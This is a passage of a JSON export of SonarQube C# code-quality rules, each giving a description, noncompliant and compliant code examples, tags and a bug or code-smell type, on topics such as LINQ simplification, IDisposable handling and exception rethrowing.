_birthYear;\n Person(int birthYear)\n {\n _birthYear = birthYear;\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Fields with attributes are ignored.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2955","repo":"csharpsquid","name":"Generic parameters not constrained to reference types should not be compared to \"null\"","htmlDesc":"<p>When constraints have not been applied to restrict a generic type parameter to be a reference type, then a value type, such as a\n<code>struct<\/code>, could also be passed. In such cases, comparing the type parameter to <code>null<\/code> would always be false, because a\n<code>struct<\/code> can be empty, but never <code>null<\/code>. If a value type is truly what's expected, then the comparison should use\n<code>default()<\/code>. If it's not, then constraints should be added so that no value type can be passed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate bool IsDefault<T>(T value)\n{\n if (value == null) \/\/ Noncompliant\n {\n \/\/ ...\n }\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate bool IsDefault<T>(T value)\n{\n if(object.Equals(value, default(T)))\n {\n \/\/ ...\n }\n \/\/ ...\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nprivate bool IsDefault<T>(T value) where T : class\n{\n if (value == null)\n {\n \/\/ ...\n }\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S2971","repo":"csharpsquid","name":"\"IEnumerable\" LINQs should be simplified","htmlDesc":"<p>In the interests of readability, code that can be simplified should be simplified. To that end, there are several ways <code>IEnumerable\nLINQ<\/code>s can be simplified<\/p>\n<ul>\n <li> Use <code>OfType<\/code> instead of using <code>Select<\/code> with <code>as<\/code> to type cast elements and then null-checking in a query\n expression to choose elements based on type. <\/li>\n <li> Use <code>OfType<\/code> instead of using <code>Where<\/code> and the <code>is<\/code> operator, followed by a cast in a <code>Select<\/code> <\/li>\n <li> Use an expression in <code>Any<\/code> instead of <code>Where(element => [expression]).Any()<\/code>. <\/li>\n <li> Use <code>Count<\/code> instead of <code>Count()<\/code> when it's available. <\/li>\n <li> Don't call <code>ToArray()<\/code> or <code>ToList()<\/code> in the middle of a query chain. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nseq1.Select(element => element as T).Any(element => element != null); \/\/ Noncompliant; use OfType\nseq2.Select(element => element as T).Any(element => element != null && CheckCondition(element)); \/\/ Noncompliant; use OfType\nseq3.Where(element => element is T).Select(element => element as T); \/\/ Noncompliant; use OfType\nseq4.Where(element => element is T).Select(element => (T)element); \/\/ Noncompliant; use OfType\nseq5.Where(element => [expression]).Any(); \/\/ Noncompliant; use Any([expression])\n\nvar num = seq6.Count(); \/\/ Noncompliant\nvar arr = seq.ToList().ToArray(); \/\/Noncompliant\nvar count = seq.ToList().Count(x=>[condition]); \/\/Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nseq1.OfType<T>().Any();\nseq2.OfType<T>().Any(element => CheckCondition(element));\nseq3.OfType<T>();\nseq4.OfType<T>();\nseq5.Any(element => [expression])\n\nvar num = seq6.Count;\nvar arr = seq.ToArray();\nvar count = seq.Count(x=>[condition]);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2997","repo":"csharpsquid","name":"\"IDisposables\" created in a \"using\" statement should not be returned","htmlDesc":"<p>Typically you want to use <code>using<\/code> to create a local <code>IDisposable<\/code> variable; it will trigger disposal of the object when\ncontrol passes out of the block's scope. The exception to this rule is when your method returns that <code>IDisposable<\/code>. In that case\n<code>using<\/code> disposes of the object before the caller can make use of it, likely causing exceptions at runtime. So you should either remove\n<code>using<\/code> or avoid returning the <code>IDisposable<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic FileStream WriteToFile(string path, string text)\n{\n using (var fs = File.Create(path)) \/\/ Noncompliant\n {\n var bytes = Encoding.UTF8.GetBytes(text);\n fs.Write(bytes, 0, bytes.Length);\n return fs;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic FileStream WriteToFile(string path, string text)\n{\n var fs = File.Create(path);\n var bytes = Encoding.UTF8.GetBytes(text);\n fs.Write(bytes, 0, bytes.Length);\n return fs;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3010","repo":"csharpsquid","name":"Static fields should not be updated in constructors","htmlDesc":"<p>Assigning a value to a <code>static<\/code> field in a constructor could cause unreliable behavior at runtime since it will change the value for all\ninstances of the class.<\/p>\n<p>Instead remove the field's <code>static<\/code> modifier, or initialize it statically.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Person\n{\n private static DateTime dateOfBirth;\n private static int expectedFingers;\n\n public Person(DateTime birthday)\n {\n dateOfBirth = birthday; \/\/ Noncompliant; now everyone has this birthday\n expectedFingers = 10; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Person\n{\n private DateTime dateOfBirth;\n private static int expectedFingers = 10;\n\n public Person(DateTime birthday)\n {\n this.dateOfBirth = birthday;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3052","repo":"csharpsquid","name":"Members should not be initialized to default values","htmlDesc":"<p>The compiler automatically initializes class fields, auto-properties and events to their default values before setting them with any initialization\nvalues, so there is no need to explicitly set a member to its default value. Further, under the logic that cleaner code is better code, it's\nconsidered poor style to do so.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass X\n{\n public int field = 0; \/\/ Noncompliant\n public object o = null; \/\/ Noncompliant\n public object MyProperty { get; set; } = null; \/\/ Noncompliant\n public event EventHandler MyEvent = null; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass X\n{\n public int field;\n public object o;\n public object MyProperty { get; set; }\n public event EventHandler MyEvent;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p><code>const<\/code> fields are ignored.<\/p>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3169","repo":"csharpsquid","name":"Multiple \"OrderBy\" calls should not be used","htmlDesc":"<p>There's no point in chaining multiple <code>OrderBy<\/code> calls in a LINQ; only the last one will be reflected in the result because each\nsubsequent call completely reorders the list. Thus, calling <code>OrderBy<\/code> multiple times is a performance issue as well, because all of the\nsorting will be executed, but only the result of the last sort will be kept.<\/p>\n<p>Instead, use <code>ThenBy<\/code> for each call after the first. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = personList\n .OrderBy(person => person.Age)\n .OrderBy(person => person.Name) \/\/ Noncompliant\n .ToList(); \/\/ x is sorted by Name, not sub-sorted\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = personList\n .OrderBy(person => person.Age)\n .ThenBy(person => person.Name)\n .ToList();\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3217","repo":"csharpsquid","name":"\"Explicit\" conversions of \"foreach\" loops should not be used","htmlDesc":"<p>The <code>foreach<\/code> statement was introduced in the C# language prior to generics to make it easier to work with the non-generic collections\navailable at that time such as <code>ArrayList<\/code>. The <code>foreach<\/code> statements allows you to downcast elements of a collection of\n<code>Object<\/code>s to any other type. The problem is that to achieve the cast, the <code>foreach<\/code> statements silently performs\n<code>explicit<\/code> type conversion, which at runtime can result in an <code>InvalidCastException<\/code>.<\/p>\n<p>C# code iterating on generic collections or arrays should not rely on <code>foreach<\/code> statement's silent <code>explicit<\/code>\nconversions.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Fruit { }\npublic class Orange : Fruit { }\npublic class Apple : Fruit { }\n\nclass MyTest\n{\n public void Test()\n {\n var fruitBasket = new List<Fruit>();\n fruitBasket.Add(new Orange());\n fruitBasket.Add(new Orange());\n \/\/ fruitBasket.Add(new Apple()); \/\/ uncommenting this line will make both foreach below throw an InvalidCastException\n\n foreach (Fruit fruit in fruitBasket)\n {\n var orange = (Orange)fruit; \/\/ This \"explicit\" conversion is hidden within the foreach loop below\n ...\n }\n\n foreach (Orange orange in fruitBasket) \/\/ Noncompliant\n {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar fruitBasket = new List<Orange>();\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Orange());\n\/\/ fruitBasket.Add(new Apple()); \/\/ uncommenting this line won't compile\n\nforeach (Orange orange in fruitBasket)\n{\n ...\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nvar fruitBasket = new List<Fruit>();\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Orange());\nfruitBasket.Add(new Apple());\n\nforeach (Orange orange in fruitBasket.OfType<Orange>())\n{\n ...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule ignores iterations on collections of <code>object<\/code>s. This includes legacy code that uses <code>ArrayList<\/code>. Furthermore, the\nrule does not report on cases when user defined conversions are being called. <\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3237","repo":"csharpsquid","name":"\"value\" parameters should be used","htmlDesc":"<p>In property and indexer <code>set<\/code> methods, and in event <code>add<\/code> and <code>remove<\/code> methods, the implicit <code>value<\/code>\nparameter holds the value the accessor was called with. Not using the <code>value<\/code> means that the accessor ignores the caller's intent which\ncould cause unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate int count;\npublic int Count\n{\n get { return count; }\n set { count = 42; } \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate int count;\npublic int Count\n{\n get { return count; }\n set { count = value; }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic int Count\n{\n get { return count; }\n set { throw new InvalidOperationException(); }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3244","repo":"csharpsquid","name":"Anonymous delegates should not be used to unsubscribe from Events","htmlDesc":"<p>It is possible to subscribe to events with anonymous delegates, but having done so, it is impossible to unsubscribe from them. That's because the\nprocess of subscribing adds the delegate to a list. The process of unsubscribing essentially says: remove <em>this item<\/em> from the subscription\nlist. But because an anonymous delegate was used in both cases, the unsubscribe attempt tries to remove a different item from the list than was added.\nThe result: <code>NOOP<\/code>.<\/p>\n<p>Instead, save the delegate to a variable and use the variable to subscribe and unsubscribe.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlistView.PreviewTextInput += (obj,args) =>\n listView_PreviewTextInput(obj,args,listView);\n\n\/\/ ...\n\nlistView.PreviewTextInput -= (obj, args) =>\n listView_PreviewTextInput(obj, args, listView); \/\/ Noncompliant; this delegate was never subscribed\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nEventHandler func = (obj,args) => listView_PreviewTextInput(obj,args,listView);\n\nlistView.PreviewTextInput += func;\n\n\/\/ ...\n\nlistView.PreviewTextInput -= func;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3247","repo":"csharpsquid","name":"Duplicate casts should not be made","htmlDesc":"<p>Because the <code>is<\/code> operator performs a cast if the object is not null, using <code>is<\/code> to check type and then casting the same\nargument to that type, necessarily performs two casts. The same result can be achieved more efficiently with a single cast using <code>as<\/code>,\nfollowed by a null-check.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x is Fruit) \/\/ Noncompliant\n{\n var f = (Fruit)x; \/\/ or x as Fruit\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar f = x as Fruit;\nif (f != null)\n{\n \/\/ code\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3256","repo":"csharpsquid","name":"\"string.IsNullOrEmpty\" should be used","htmlDesc":"<p>Using <code>string.Equals<\/code> to determine if a string is empty is significantly slower than using <code>string.IsNullOrEmpty()<\/code> or\nchecking for <code>string.Length == 0<\/code>. <code>string.IsNullOrEmpty()<\/code> is both clear and concise, and therefore preferred to laborious,\nerror-prone, manual null- and emptiness-checking.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\"\".Equals(name); \/\/ Noncompliant\n!name.Equals(\"\"); \/\/ Noncompliant\nname.Equals(string.Empty); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nname != null && name.Length > 0 \/\/ Compliant but more error prone\n!string.IsNullOrEmpty(name)\nstring.IsNullOrEmpty(name)\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3257","repo":"csharpsquid","name":"Declarations and initializations should be as concise as possible","htmlDesc":"<p>Unnecessarily verbose declarations and initializations make it harder to read the code, and should be simplified.<\/p>\n<p>Specifically the following should be omitted when they can be inferred:<\/p>\n<ul>\n <li> array element type <\/li>\n <li> array size <\/li>\n <li> <code>new DelegateType<\/code> <\/li>\n <li> <code>new Nullable<Type><\/code> <\/li>\n <li> object or collection initializers (<code>{<\/code>}) <\/li>\n <li> type of lambda expression parameters <\/li>\n <li> parameter declarations of anonymous methods when the parameters are not used. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar l = new List<int>() {}; \/\/ Noncompliant, {} can be removed\nvar o = new object() {}; \/\/ Noncompliant, {} can be removed\n\nvar ints = new int[] {1, 2, 3}; \/\/ Noncompliant, int can be omitted\nints = new int[3] {1, 2, 3}; \/\/ Noncompliant, the size specification can be removed\n\nint? i = new int?(5); \/\/ Noncompliant new int? could be omitted, it can be inferred from the declaration, and there's implicit conversion from T to T?\nvar j = new int?(5);\n\nFunc<int, int> f1 = (int i) => 1; \/\/Noncompliant, can be simplified\n\nclass Class\n{\n private event EventHandler MyEvent;\n\n public Class()\n {\n MyEvent += new EventHandler((a,b)=>{ }); \/\/ Noncompliant, needlessly verbose\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar l = new List<int>();\nvar o = new object();\n\nvar ints = new [] {1, 2, 3};\nints = new [] {1, 2, 3};\n\nint? i = 5;\nvar j = new int?(5);\n\nFunc<int, int> f1 = (i) => 1;\n\nclass Class\n{\n private event EventHandler MyEvent;\n\n public Class()\n {\n MyEvent += (a,b)=>{ };\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3376","repo":"csharpsquid","name":"Attribute, EventArgs, and Exception type names should end with the type being extended","htmlDesc":"<p>Adherence to the standard naming conventions makes your code not only more readable, but more usable. For instance, <code>class FirstAttribute :\nAttribute<\/code> can be used simply with <code>First<\/code>, but you must use the full name for <code>class AttributeOne : Attribute<\/code>.<\/p>\n<p>This rule raises an issue when classes extending <code>Attribute<\/code>, <code>EventArgs<\/code>, or <code>Exception<\/code>, do not end with their\nparent class names.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass AttributeOne : Attribute \/\/ Noncompliant\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass FirstAttribute : Attribute\n{\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>If a class' direct base class doesn't follow the convention, then no issue is reported on the class itself, regardless of whether or not it\nconforms to the convention.<\/p>\n<pre>\nclass Timeout : Exception \/\/ Noncompliant\n{\n}\nclass ExtendedTimeout : Timeout \/\/ Ignored; doesn't conform to convention, but the direct base doesn't conform either\n{\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3444","repo":"csharpsquid","name":"Interfaces should not simply inherit from base interfaces with colliding members","htmlDesc":"<p>When an interface inherits from two interfaces that both define a member with the same name, trying to access that member through the derived\ninterface will result in the compiler error <code>CS0229 Ambiguity between 'IBase1.SomeProperty' and 'IBase2.SomeProperty'<\/code>.<\/p>\n<p>So instead, every caller will be forced to cast instances of the derived interface to one or the other of its base interfaces to resolve the\nambiguity and be able to access the member. Instead, it is better to resolve the ambiguity in the definition of the derived interface either by:<\/p>\n<ul>\n <li> renaming the member in one of the base interfaces to remove the collision <\/li>\n <li> also defining that member in the derived interface. Use this only if all copies of the member are meant to hold the same value. <\/li>\n<\/ul>\n<p> <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic interface IBase1\n{\n string SomeProperty { get; set; }\n}\n\npublic interface IBase2\n{\n string SomeProperty { get; set; }\n}\n\npublic interface IDerived : IBase1, IBase2 \/\/ Noncompliant, accessing IDerived.SomeProperty is ambiguous\n{\n}\n\npublic class MyClass : IDerived\n{\n \/\/ Implements both IBase1.SomeProperty and IBase2.SomeProperty\n public string SomeProperty { get; set; } = \"Hello\";\n\n public static void Main()\n {\n MyClass myClass = new MyClass();\n Console.WriteLine(myClass.SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IBase1)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IBase2)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IDerived)myClass).SomeProperty); \/\/ Error CS0229 Ambiguity between 'IBase1.SomeProperty' and 'IBase2.SomeProperty'\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic interface IDerived : IBase1, IBase2\n{\n new string SomeProperty { get; set; }\n}\n\npublic class MyClass : IDerived\n{\n \/\/ Implements IBase1.SomeProperty, IBase2.SomeProperty and IDerived.SomeProperty\n public string SomeProperty { get; set; } = \"Hello\";\n\n public static void Main()\n {\n MyClass myClass = new MyClass();\n Console.WriteLine(myClass.SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IBase1)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IBase2)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n Console.WriteLine(((IDerived)myClass).SomeProperty); \/\/ Writes \"Hello\" as expected\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\npublic interface IBase1\n{\n string SomePropertyOne { get; set; }\n}\n\npublic interface IBase2\n{\n string SomePropertyTwo { get; set; }\n}\n\npublic interface IDerived : IBase1, IBase2\n{\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3445","repo":"csharpsquid","name":"Exceptions should not be explicitly rethrown","htmlDesc":"<p>When rethrowing an exception, you should do it by simply calling <code>throw;<\/code> and not <code>throw exc;<\/code>, because the stack trace is\nreset with the second syntax, making debugging a lot harder.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntry\n{}\ncatch(ExceptionType1 exc)\n{\n Console.WriteLine(exc);\n throw exc; \/\/ Noncompliant; stacktrace is reset\n}\ncatch (ExceptionType2 exc)\n{\n throw new Exception(\"My custom message\", exc); \/\/ Compliant; stack trace preserved\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ntry\n{}\ncatch(ExceptionType1 exc)\n{\n Console.WriteLine(exc);\n throw;\n}\ncatch (ExceptionType2 exc)\n{\n throw new Exception(\"My custom message\", exc);\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3453","repo":"csharpsquid","name":"Classes should not have only \"private\" constructors","htmlDesc":"<p>A class with only <code>private<\/code> constructors can't be instantiated, thus, it seems to be pointless code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class MyClass \/\/ Noncompliant\n{\n private MyClass() { ... }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyClass\n{\n public MyClass() { ... }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Classes that themselves access their private constructors (singletons or smart enums) are ignored. Classes with only <code>static<\/code> members\nare also ignored because they are covered by Rule S1118.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3456","repo":"csharpsquid","name":"\"string.ToCharArray()\" should not be called redundantly","htmlDesc":"<p><code>ToCharArray<\/code> can be omitted when the operation on the array could have been done directly on the string, such as when iterating over\nthe characters in a string, and when accessing a character in a string via an array index. In those cases, explicit <code>ToCharArray<\/code> calls\nshould be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring str = \"some string\";\nforeach (var c in str.ToCharArray()) \/\/ Noncompliant\n{\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring str = \"some string\";\nforeach (var c in str)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3457","repo":"csharpsquid","name":"Composite format strings should be used correctly","htmlDesc":"<p>Because composite format strings are interpreted at runtime, rather than validated by the compiler, they can contain errors that lead to unexpected\nbehaviors or runtime errors. This rule statically validates the good behavior of composite formats when calling the methods of\n<code>String.Format<\/code>, <code>StringBuilder.AppendFormat<\/code>, <code>Console.Write<\/code>, <code>Console.WriteLine<\/code>,\n<code>TextWriter.Write<\/code>, <code>TextWriter.WriteLine<\/code>, <code>Debug.WriteLine(String,\u2002Object[])<\/code>,\n<code>Trace.TraceError(String,\u2002Object[])<\/code>, <code>Trace.TraceInformation(String,\u2002Object[])<\/code>,\n<code>Trace.TraceWarning(String,\u2002Object[])<\/code> and <code>TraceSource.TraceInformation(String,\u2002Object[])<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ns = string.Format(\"{0}\", arg0, arg1); \/\/ Noncompliant, arg1 is declared but not used.\ns = string.Format(\"{0} {2}\", arg0, arg1, arg2); \/\/ Noncompliant, the format item with index 1 is missing so arg1 will not be used.\ns = string.Format(\"foo\"); \/\/ Noncompliant, there is no need to use string.Format here.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ns = string.Format(\"{0}\", arg0);\ns = string.Format(\"{0} {1}\", arg0, arg2);\ns = \"foo\";\n<\/pre>\n<h2>Exceptions<\/h2>\n<ul>\n <li> No issue is raised if the format string is not a <code>const<\/code>. <\/li>\n<\/ul>\n<pre>\nvar pattern = \"{0} {1} {2}\";\nvar res = string.Format(pattern, 1, 2); \/\/ Compliant, not const string are not recognized\n<\/pre>\n<ul>\n <li> No issue is raised if the argument is not an inline creation array. <\/li>\n<\/ul>\n<pre>\nvar array = new int[] {};\nvar res = string.Format(\"{0} {1}\", array); \/\/ Compliant we don't know the size of the array\n<\/pre>\n<ul>\n <li> This rule doesn't check whether the format specifier (defined after the <code>:<\/code>) is actually valid. <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/wQA1\">CERT, FIO47-C.<\/a> - Use valid format strings <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/e4EyAQ\">CERT, FIO00-CPP.<\/a> - Take care when creating format strings <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3458","repo":"csharpsquid","name":"Empty \"case\" clauses that fall through to the \"default\" should be omitted","htmlDesc":"<p>Empty <code>case<\/code> clauses that fall through to the default are useless. Whether or not such a <code>case<\/code> is present, the\n<code>default<\/code> clause will be invoked. Such <code>case<\/code>s simply clutter the code, and should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch(ch)\n{\n case 'a' :\n HandleA();\n break;\n case 'b' :\n HandleB();\n break;\n case 'c' : \/\/ Noncompliant\n default:\n HandleTheRest();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch(ch)\n{\n case 'a' :\n HandleA();\n break;\n case 'b' :\n HandleB();\n break;\n default:\n HandleTheRest();\n break;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3532","repo":"csharpsquid","name":"Empty \"default\" clauses should be removed","htmlDesc":"<p>The <code>default<\/code> clause should take appropriate action. Having an empty <code>default<\/code> is a waste of keystrokes.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nenum Fruit\n{\n Apple,\n Orange,\n Banana\n}\n\nvoid PrintName(Fruit fruit)\n{\n switch(fruit)\n {\n case Fruit.Apple:\n Console.WriteLine(\"apple\");\n break;\n default: \/\/Noncompliant\n break;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum Fruit\n{\n Apple,\n Orange,\n Banana\n}\n\nvoid PrintName(Fruit fruit)\n{\n switch(fruit)\n {\n case Fruit.Apple:\n Console.WriteLine(\"apple\");\n break;\n default:\n throw new NotSupportedException();\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nvoid PrintName(Fruit fruit)\n{\n switch(fruit)\n {\n case Fruit.Apple:\n Console.WriteLine(\"apple\");\n break;\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3604","repo":"csharpsquid","name":"Member initializer values should not be redundant","htmlDesc":"<p>Fields, properties and events can be initialized either inline or in the constructor. Initializing them inline and in the constructor at the same\ntime is redundant; the inline initialization will be overridden.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Person\n{\n int age = 42; \/\/ Noncompliant\n public Person(int age)\n {\n this.age = age;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Person\n{\n int age;\n public Person(int age)\n {\n this.age = age;\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't report an issue if not all constructors initialize the field. If the field is initialized inline to its default value, then\n<a href='\/coding_rules#rule_key=csharpsquid%3AS3052'>S3052<\/a> already reports an issue on the initialization. <\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3871","repo":"csharpsquid","name":"Exception types should be \"public\"","htmlDesc":"<p>The point of having custom exception types is to convey more information than is available in standard types. But custom exception types must be\n<code>public<\/code> for that to work. <\/p>\n<p>If a method throws a non-public exception, the best you can do on the caller's side is to <code>catch<\/code> the closest <code>public<\/code> base\nof the class. That is, you lose all that custom information you created the exception type to pass. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninternal class MyException : Exception \/\/ Noncompliant\n{\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyException : Exception\n{\n \/\/ ...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule ignores Exception types that are not derived directly from <code>System.Exception<\/code>, <code>System.SystemException<\/code>, or\n<code>System.ApplicationException<\/code>.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3872","repo":"csharpsquid","name":"Parameter names should not duplicate the names of their methods","htmlDesc":"<p>The name of a method should communicate what it does, and the names of its parameters should indicate how they're used. If a method and its\nparameter have the same name it is an indication that one of these rules of thumb has been broken, if not both. Even if by some trick of language\nthat's not the case, it is still likely to confuse callers and maintainers.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void Login(string login) \/\/ Noncompliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void Login(string userName)\n{\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3874","repo":"csharpsquid","name":"\"out\" and \"ref\" parameters should not be used","htmlDesc":"<p>Passing a parameter by reference, which is what happens when you use the <code>out<\/code> or <code>ref<\/code> parameter modifiers, means that the\nmethod will receive a pointer to the argument, rather than the argument itself. If the argument was a value type, the method will be able to change\nthe argument's values. If it was a reference type, then the method receives a pointer to a pointer, which is usually not what was intended. Even when\nit is what was intended, this is the sort of thing that's difficult to get right, and should be used with caution.<\/p>\n<p>This rule raises an issue when <code>out<\/code> or <code>ref<\/code> is used on a non-<code>Optional<\/code> parameter in a public method.\n<code>Optional<\/code> parameters are covered by S3447.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void GetReply(\n ref MyClass input, \/\/ Noncompliant\n out string reply) \/\/ Noncompliant\n{ ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic string GetReply(MyClass input)\n{ ... }\n\npublic bool TryGetReply(MyClass input, out string reply)\n{ ... }\n\npublic ReplyData GetReply(MyClass input)\n{ ... }\n\ninternal void GetReply(ref MyClass input, out string reply)\n{ ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise issues for:<\/p>\n<p>- non-public methods<\/p>\n<p>- methods with only 'out' parameters, name starting with \"Try\" and return type bool.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3875","repo":"csharpsquid","name":"\"operator==\" should not be overloaded on reference types","htmlDesc":"<p>The use of <code>==<\/code> to compare to objects is expected to do a reference comparison. That is, it is expected to return <code>true<\/code> if\nand only if they are the same object instance. Overloading the operator to do anything else will inevitably lead to the introduction of bugs by\ncallers. On the other hand, overloading it to do exactly that is pointless; that's what <code>==<\/code> does by default.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic static 